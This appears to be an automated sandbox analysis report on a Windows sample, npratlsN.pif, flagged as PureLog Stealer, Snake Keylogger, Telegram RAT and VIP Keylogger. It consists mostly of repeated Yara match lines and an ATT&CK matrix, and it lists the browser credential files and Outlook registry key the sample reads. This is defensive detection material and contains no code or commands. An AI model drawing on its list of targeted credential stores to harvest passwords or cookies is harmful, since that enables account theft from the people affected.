Source: Yara match	File source: 13.3.npratlsN.pif.1abebba8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1c7c9a06.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1c7ca8ee.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1efb0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2aa40ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.npratlsN.pif.1abebba8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1f7f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.npratlsN.pif.2b88cb18.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2812a8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3850452895.000000002853D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3853601584.000000002D9F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3852283482.000000001CC7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: npratlsN.pif PID: 7716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: npratlsN.pif PID: 8008, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: npratlsN.pif PID: 8188, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\Public\Libraries\npratlsN.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\Public\Libraries\npratlsN.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\Public\Libraries\npratlsN.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Public\Libraries\npratlsN.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\Public\Libraries\npratlsN.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\npratlsN.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\npratlsN.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\Public\Libraries\npratlsN.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\Public\Libraries\npratlsN.pif	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\Public\Libraries\npratlsN.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\Public\Libraries\npratlsN.pif	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\Public\Libraries\npratlsN.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 15.2.npratlsN.pif.2fd20000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1f7f0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2812a8ee.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1c7ca8ee.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2fd20000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.304b0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.304b0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2d63a8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2d639a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2aa40000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1efb0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2b0c0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.28129a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2fd20ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2d639a06.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2aa40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1efb0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1efb0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2aa40ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.28129a06.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.npratlsN.pif.2b88cb18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2b0c0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2d63a8ee.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2fd20ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.npratlsN.pif.1abebba8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2aa40ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1c7c9a06.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1efb0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2812a8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1c7c9a06.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.npratlsN.pif.1abebba8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1c7ca8ee.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.npratlsN.pif.2b88cb18.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1f7f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3852283482.000000001CC41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3855219862.00000000294A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3856159190.000000001DC16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3857060736.000000002E981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: npratlsN.pif PID: 7716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: npratlsN.pif PID: 8008, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: npratlsN.pif PID: 8188, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 15.2.npratlsN.pif.2fd20000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1f7f0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2812a8ee.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1c7ca8ee.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2fd20000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.304b0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.304b0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2d63a8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2d639a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2aa40000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1efb0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2b0c0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.28129a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2fd20ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2d639a06.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2aa40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1efb0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2aa40ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.npratlsN.pif.2b88cb18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2b0c0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2d63a8ee.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.28129a06.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2fd20ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1efb0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1c7c9a06.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.npratlsN.pif.1abebba8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1c7c9a06.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1c7ca8ee.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1efb0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2aa40ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.npratlsN.pif.1abebba8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1f7f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.npratlsN.pif.2b88cb18.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2812a8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3855219862.00000000294A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3856159190.000000001DC16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3857060736.000000002E981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 00000011.00000002.3850452895.0000000028401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3853601584.000000002D8E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3852283482.000000001CB71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 15.2.npratlsN.pif.2fd20000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1f7f0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2812a8ee.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1c7ca8ee.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2fd20000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.304b0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.304b0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2d63a8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2d639a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2aa40000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1efb0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2b0c0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.28129a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2fd20ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2d639a06.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2aa40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1efb0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2aa40ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.npratlsN.pif.2b88cb18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2b0c0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2d63a8ee.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.28129a06.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2fd20ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1efb0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1c7c9a06.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.npratlsN.pif.1abebba8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1c7c9a06.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1c7ca8ee.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1efb0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2aa40ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.npratlsN.pif.1abebba8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1f7f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.npratlsN.pif.2b88cb18.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2812a8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3852283482.000000001CC41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: npratlsN.pif PID: 7716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: npratlsN.pif PID: 8008, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: npratlsN.pif PID: 8188, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 15.2.npratlsN.pif.2fd20000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1f7f0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2812a8ee.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1c7ca8ee.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2fd20000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.304b0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.304b0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2d63a8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2d639a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2aa40000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1efb0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2b0c0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.28129a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2fd20ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2d639a06.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2aa40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1efb0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2aa40ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.npratlsN.pif.2b88cb18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2b0c0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2d63a8ee.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.28129a06.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2fd20ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1efb0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1c7c9a06.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.npratlsN.pif.1abebba8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1c7c9a06.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1c7ca8ee.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1efb0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2aa40ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.npratlsN.pif.1abebba8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1f7f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.npratlsN.pif.2b88cb18.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2812a8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3850452895.000000002853D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3853601584.000000002D9F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3852283482.000000001CC7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: npratlsN.pif PID: 7716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: npratlsN.pif PID: 8008, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: npratlsN.pif PID: 8188, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	22 Scripting	1 Valid Accounts	1 Native API	22 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Shared Modules	1 DLL Side-Loading	1 Extra Window Memory Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 System Network Connections Discovery	Remote Desktop Protocol	1 Data from Local System	13 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	33 Exploitation for Client Execution	1 Valid Accounts	1 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	2 Software Packing	NTDS	36 System Information Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	311 Process Injection	1 Timestomp	LSA Secrets	1 Query Registry	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Cached Domain Credentials	241 Security Software Discovery	VNC	GUI Input Capture	234 Application Layer Protocol	Data Transfer Size Limits	Service Stop
